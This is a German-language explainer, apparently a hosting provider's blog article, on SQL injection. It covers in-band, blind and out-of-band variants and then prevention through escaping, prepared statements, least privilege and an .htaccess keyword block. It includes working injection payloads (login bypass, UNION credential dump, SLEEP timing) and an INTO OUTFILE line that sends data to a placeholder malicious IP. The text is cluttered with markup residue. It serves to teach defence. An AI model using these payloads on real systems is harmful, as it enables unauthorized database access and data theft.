Was ist eine SQL-Injektion?<\/h2>\n
SQL (Structured Query Language) ist eine Sprache, die es uns erm\u00f6glicht, mit Datenbanken zu interagieren<\/a>. Moderne Webanwendungen nutzen Datenbanken, um Daten zu verwalten und dem Leser dynamische Inhalte anzuzeigen.<\/p>\n Bei einer SQL-Injection (oder SQLi) versucht ein Benutzer, b\u00f6sartige SQL-Anweisungen in eine Webanwendung einzuf\u00fcgen. Wenn sie erfolgreich sind, k\u00f6nnen sie auf sensible Daten in der Datenbank zugreifen.<\/p>\n Auch im Jahr 2023 geh\u00f6ren SQL-Injections zu den h\u00e4ufigsten Angriffen im Internet. Allein im Jahr 2022 wurden 1162 SQL-Injection-Schwachstellen<\/a> in die CVE-Sicherheitsdatenbank aufgenommen.<\/p>\n Die gute Nachricht ist, dass SQL-Injektionen nicht mehr so h\u00e4ufig vorkommen wie fr\u00fcher. Die meisten Anwendungen haben sich weiterentwickelt, um sich vor SQL-Angriffen zu sch\u00fctzen.<\/p>\n Im Jahr 2012 waren 97 Prozent aller Datenschutzverletzungen<\/a> auf SQL-Injektionen zur\u00fcckzuf\u00fchren. Heutzutage ist diese Zahl zwar immer noch hoch, aber viel \u00fcberschaubarer.<\/p>\n Eine SQL-Injection-Schwachstelle verschafft einem Angreifer durch die Verwendung b\u00f6sartiger SQL-Anweisungen vollst\u00e4ndigen Zugriff auf die Datenbank deiner Anwendung.<\/p>\n Schauen wir uns ein Beispiel f\u00fcr eine verwundbare Anwendung an.<\/p>\n Stell dir den Arbeitsablauf einer typischen Webanwendung vor, die Datenbankabfragen durch Benutzereingaben beinhaltet. Du nimmst die Benutzereingaben \u00fcber ein Formular entgegen, zum Beispiel ein Anmeldeformular. Dann fragst du deine Datenbank mit den vom Benutzer eingegebenen Feldern ab, um ihn zu authentifizieren. Die Struktur der Abfrage an deine Datenbank sieht etwa so aus:<\/p>\n Der Einfachheit halber nehmen wir an, dass du deine Passw\u00f6rter im Klartext speicherst. Es ist jedoch ratsam, deine Passw\u00f6rter mit Salts zu versehen<\/a> und dann zu hashen. Wenn du den Benutzernamen und das Passwort aus dem Formular erhalten hast, kannst du die Abfrage in PHP wie folgt definieren:<\/p>\n Wenn jemand den Wert „admin‘;-“ in das Feld f\u00fcr den Benutzernamen eingibt, lautet die resultierende SQL-Abfrage, die die Variable $db_query erzeugt, wie folgt:<\/p>\n Was bewirkt diese Abfrage?<\/p>\n In SQL beginnt das Symbol — einen Kommentar, sodass alles, was danach kommt, ignoriert wird. Dadurch wird die Passwortpr\u00fcfung aus der Abfrage entfernt. Wenn also „admin“ ein g\u00fcltiger Benutzername ist, kann sich der Angreifer anmelden, ohne das Passwort zu kennen. Zumindest dann, wenn es keine Sicherheitsvorkehrungen gegen diese Art von Angriffen gibt.<\/p>\n Alternativ kann in diesem Beispiel auch ein boolescher Angriff verwendet werden, um Zugang zu erhalten. Wenn ein Angreifer „password‘ oder 1=1;-“ in das Passwortfeld eingibt, w\u00fcrde die Abfrage folgenderma\u00dfen aussehen:<\/p>\n In diesem Fall w\u00fcrdest du, auch wenn dein Passwort falsch ist, f\u00fcr die Anwendung authentifiziert werden. Wenn deine Webseite die Ergebnisse der Datenbankabfrage anzeigt, kann ein Angreifer den Befehl zum Anzeigen von Tabellen, den Befehl zum Anzeigen der Tabellen in der Datenbank verwenden und dann selektiv Tabellen l\u00f6schen, wenn er das m\u00f6chte.<\/p>\n Exploits of a Mom, ein beliebter Comicstrip von XKCD, zeigt das Gespr\u00e4ch einer Mutter mit der Schule ihres Sohnes, in dem sie gefragt wird, ob sie ihren Sohn wirklich „Robert‘); DROP TABLE Students; -“ genannt hat.<\/figure>\n Nachdem du nun die Grundlagen einer SQL-Injection-Schwachstelle kennst, wollen wir uns die verschiedenen Arten von SQL-Injection-Angriffen und die Gr\u00fcnde daf\u00fcr ansehen.<\/p>\n In-Band SQL Injection ist die einfachste Form der SQL Injection. Dabei kann der Angreifer denselben Kanal nutzen, um den b\u00f6sartigen SQL-Code in die Anwendung einzuf\u00fcgen und die Ergebnisse zu sammeln.<\/p>\n Schauen wir uns zwei Formen von In-Band-SQL-Injection-Angriffen an.<\/p>\n Ein fehlerbasierter Angriff liegt vor, wenn jemand absichtlich die SQL-Abfrage manipuliert, um einen Datenbankfehler zu erzeugen. Die von der Datenbank zur\u00fcckgegebene Fehlermeldung enth\u00e4lt oft Informationen \u00fcber die Datenbankstruktur, die der Angreifer nutzen kann, um das System weiter auszunutzen.<\/p>\n Ein Angreifer kann zum Beispiel ‚ OR ‚1‘=’1 in ein Formularfeld eingeben. Wenn die Anwendung verwundbar ist, k\u00f6nnte sie eine Fehlermeldung ausgeben, die Informationen \u00fcber die Datenbank enth\u00e4lt.<\/p>\n Union-basierte SQL-Injection-Angriffe verwenden den SQL UNION-Operator, um die Ergebnisse der urspr\u00fcnglichen Abfrage mit den Ergebnissen von eingeschleusten b\u00f6sartigen Abfragen zu kombinieren.<\/p>\n Dadurch kann der Angreifer Informationen aus anderen Tabellen der Datenbank abrufen:<\/p>\n In dieser Abfrage kombiniert der UNION-Operator die Ergebnisse der urspr\u00fcnglichen Abfrage mit den Ergebnissen von SELECT username<\/em>, password<\/em> FROM user_table<\/em>. Wenn die Anwendung verwundbar ist und die Benutzereingaben nicht ordnungsgem\u00e4\u00df bereinigt, k\u00f6nnte sie eine Seite mit Benutzernamen und Passw\u00f6rtern aus der Benutzertabelle zur\u00fcckgeben.<\/p>\n Selbst wenn ein Angreifer einen Fehler in der SQL-Abfrage erzeugt, wird die Antwort der Abfrage m\u00f6glicherweise nicht direkt an die Webseite \u00fcbermittelt. In diesem Fall muss der Angreifer weiter nachforschen.<\/p>\n Bei dieser Form der SQL-Injektion sendet der Angreifer verschiedene Abfragen an die Datenbank, um herauszufinden, wie die Anwendung diese Antworten auswertet. Eine inferentielle SQL-Injection wird manchmal auch als blinde SQL-Injection bezeichnet.<\/p>\n Im Folgenden werden wir uns zwei Arten von inferentiellen SQL-Injections ansehen: boolesche SQL-Injektion und zeitbasierte SQL-Injektion.<\/p>\n Wenn eine SQL-Abfrage zu einem Fehler f\u00fchrt, der nicht intern in der Anwendung behandelt wurde, kann die resultierende Webseite einen Fehler ausl\u00f6sen, eine leere Seite laden oder nur teilweise geladen werden. Bei einer booleschen SQL-Injektion pr\u00fcft ein Angreifer, welche Teile der Benutzereingabe f\u00fcr SQL-Injektionen anf\u00e4llig sind, indem er zwei verschiedene Versionen einer booleschen Klausel in der Eingabe ausprobiert:<\/p>\n Diese Abfragen sind so konzipiert, dass sie eine Bedingung enthalten, die entweder wahr oder falsch ist. Wenn die Bedingung wahr ist, wird die Seite normal geladen. Wenn sie falsch ist, wird die Seite m\u00f6glicherweise anders geladen oder es wird ein Fehler angezeigt.<\/p>\n Indem er beobachtet, wie die Seite geladen wird, kann der Angreifer feststellen, ob die Bedingung wahr oder falsch war, auch wenn er die eigentliche SQL-Abfrage oder die Antwort der Datenbank nicht sieht. Wenn du mehrere \u00e4hnliche Bedingungen zusammenstellst, kannst du langsam Informationen aus der Datenbank extrahieren.<\/p>\n Mit einem zeitbasierten SQL-Injection-Angriff kann ein Angreifer feststellen, ob eine Schwachstelle in einer Webanwendung vorhanden ist<\/a>. Ein Angreifer nutzt eine vordefinierte zeitbasierte Funktion des Datenbankmanagementsystems, das von der Anwendung verwendet wird. In MySQL<\/a> zum Beispiel weist die Funktion sleep()<\/em><\/a> die Datenbank an, eine bestimmte Anzahl von Sekunden zu warten.<\/p>\n Wenn eine solche Abfrage zu einer Verz\u00f6gerung f\u00fchrt, wei\u00df der Angreifer, dass sie verwundbar ist. Dieser Ansatz \u00e4hnelt den booleschen Angriffen, da du keine tats\u00e4chliche Antwort von der Datenbank erh\u00e4ltst. Allerdings kann man daraus Informationen gewinnen, wenn der Angriff erfolgreich ist.<\/p>\n Bei einem Out-of-Band-SQL-Injection-Angriff manipuliert der Angreifer die SQL-Abfrage, um die Datenbank anzuweisen, Daten an einen vom Angreifer kontrollierten Server zu \u00fcbermitteln. Dies wird in der Regel durch Datenbankfunktionen erreicht, die externe Ressourcen anfordern k\u00f6nnen, wie z. B. HTTP-Anfragen oder DNS-Abfragen.<\/p>\n Ein Out-of-Band SQL-Injection-Angriff nutzt eine externe Dateiverarbeitungsfunktion deines DBMS. In MySQL k\u00f6nnen die Funktionen LOAD_FILE() und INTO OUTFILE verwendet werden, um MySQL aufzufordern, die Daten an eine externe Quelle zu \u00fcbertragen.<\/p>\n So k\u00f6nnte ein Angreifer OUTFILE nutzen, um die Ergebnisse einer Abfrage an eine externe Quelle zu senden:<\/p>\n In \u00e4hnlicher Weise kann die Funktion LOAD_FILE() verwendet werden, um eine Datei vom Server zu lesen und ihren Inhalt anzuzeigen. Eine Kombination aus LOAD_FILE() und OUTFILE kann verwendet werden, um den Inhalt einer Datei auf dem Server zu lesen und ihn dann an einen anderen Ort zu \u00fcbertragen.<\/p>\n Bisher haben wir uns mit den Schwachstellen in einer Webanwendung besch\u00e4ftigt, die zu SQL-Injection-Angriffen f\u00fchren k\u00f6nnen. Eine SQL-Injection-Schwachstelle kann von einem Angreifer genutzt werden, um den Inhalt deiner Datenbank zu lesen, zu ver\u00e4ndern oder sogar zu l\u00f6schen.<\/p>\n Au\u00dferdem kann sie es ihm erm\u00f6glichen, eine Datei an einem beliebigen Ort innerhalb des Servers zu lesen und den Inhalt an einen anderen Ort zu \u00fcbertragen. In diesem Abschnitt stellen wir verschiedene Techniken vor, mit denen du deine Webanwendung und Website vor SQL-Injection-Angriffen sch\u00fctzen kannst.<\/p>\n Im Allgemeinen ist es schwierig festzustellen, ob eine Benutzereingabe b\u00f6sartig ist oder nicht. Eine g\u00e4ngige Methode ist daher, Sonderzeichen in Benutzereingaben zu umgehen. Dieses Verfahren kann zum Schutz vor SQL-Injection-Angriffen beitragen.<\/p>\n In PHP kannst du eine Zeichenkette vor dem Aufbau der Abfrage mit der Funktion Wenn du Benutzereingaben als HTML darstellst, ist es au\u00dferdem wichtig, Sonderzeichen in die entsprechenden HTML-Zeichen umzuwandeln, um Cross-Site Scripting (XSS)-Angriffe zu verhindern. Du kannst Sonderzeichen in PHP mit der Funktion Alternativ kannst du auch Prepared Statements verwenden, um SQL-Injections zu vermeiden. Eine vorbereitete Anweisung ist eine Vorlage f\u00fcr eine SQL-Abfrage, bei der du zu einem sp\u00e4teren Zeitpunkt Parameter angibst, um sie auszuf\u00fchren.<\/p>\n Hier ist ein Beispiel f\u00fcr ein Prepared Statement in PHP und MySQLi:<\/p>\n Der n\u00e4chste Schritt, um diese Schwachstelle zu entsch\u00e4rfen, besteht darin, den Zugriff auf die Datenbank auf das N\u00f6tigste zu beschr\u00e4nken.<\/p>\n Du kannst zum Beispiel deine Webanwendung mit dem DBMS \u00fcber einen bestimmten Benutzer verbinden, der nur Zugriff auf die entsprechende Datenbank hat.<\/p>\n Au\u00dferdem solltest du den Zugriff des Datenbankbenutzers auf alle anderen Bereiche des Servers beschr\u00e4nken. Vielleicht m\u00f6chtest du auch bestimmte SQL-Schl\u00fcsselw\u00f6rter in deiner URL \u00fcber deinen Webserver blockieren.<\/p>\n Wenn du Apache als Webserver verwendest<\/a>, kannst du die folgenden Codezeilen in deiner .htaccess<\/a><\/em> datei<\/a> verwenden, um einem potenziellen Angreifer einen 403 Forbidden-Fehler<\/em><\/a> anzuzeigen.<\/p>\n Du solltest vorsichtig sein, bevor du diese Technik anwendest, denn Apache zeigt einem Leser eine Fehlermeldung an, wenn die URL diese Schl\u00fcsselw\u00f6rter enth\u00e4lt.<\/p>\nWie funktioniert die SQL-Injection-Schwachstelle?<\/h2>\n
select * from user_table\nwhere username = 'sdaityari'\nand password = 'mypassword';<\/code><\/pre>\n\/\/ Connect to SQL database\n$db_query = \"select * from user_table where\nusername = '\".$user.\"'\nAND password = '\".$password.\"';\";\n\/\/ Execute query<\/code><\/pre>\nselect * from user_table where\nusername = 'admin';--' and password = 'mypassword'<\/code><\/pre>\nselect * from user_table where\nusername = 'admin' and\npassword = 'password' or 1=1;--';<\/code><\/pre>\n![\"Exploits](\"https:\/\/kinsta.com\/wp-content\/uploads\/2023\/09\/sql-injection-cartoon.png\")
Arten von SQL Injection<\/h2>\n
In-Band SQL Injection<\/h3>\n
Fehlerbasierter Angriff<\/h4>\n
Union-basierte Attacke<\/h4>\n
select title, link from post_table\nwhere id < 10\nunion\nselect username, password\nfrom user_table; --;<\/code><\/pre>\nInferentielle SQL-Injektion (Blind SQL Injection)<\/h2>\n
Boolesche Attacke<\/h4>\n
\n
Zeitbasierter Angriff<\/h4>\n
select * from comments\nWHERE post_id=1-SLEEP(15);<\/code><\/pre>\nOut-of-Band SQL Injection<\/h2>\n
select * from post_table\ninto OUTFILE '\\\\MALICIOUS_IP_ADDRESSlocation'<\/code><\/pre>\nWie man SQL-Injections verhindert<\/h2>\n
Benutzereingaben entgehen<\/h3>\n
mysqli_real_escape_string()<\/code> entschl\u00fcsseln:<\/p>\n$unsafe_variable = $_POST[\"user_input\"]; $safe_variable = mysqli_real_escape_string($conn, $unsafe_variable);<\/code><\/pre>\nhtmlspecialchars()<\/code> umwandeln.<\/p>\nPrepared Statements verwenden<\/h3>\n
$query = $mysql_connection->prepare(\"select * from user_table where username = ? and password = ?\");\n$query->execute(array($username, $password));<\/code><\/pre>\nAndere Hygiene-Checks zur Verhinderung von SQL-Angriffen<\/h3>\n
RewriteCond %{QUERY_STRING} [^a-z](declare\u00a6char\u00a6set\u00a6cast\u00a6convert\u00a6delete\u00a6drop\u00a6exec\u00a6insert\u00a6meta\u00a6script\u00a6select\u00a6truncate\u00a6update)[^a-z] [NC]\nRewriteRule (.*) - [F]<\/code><\/pre>\n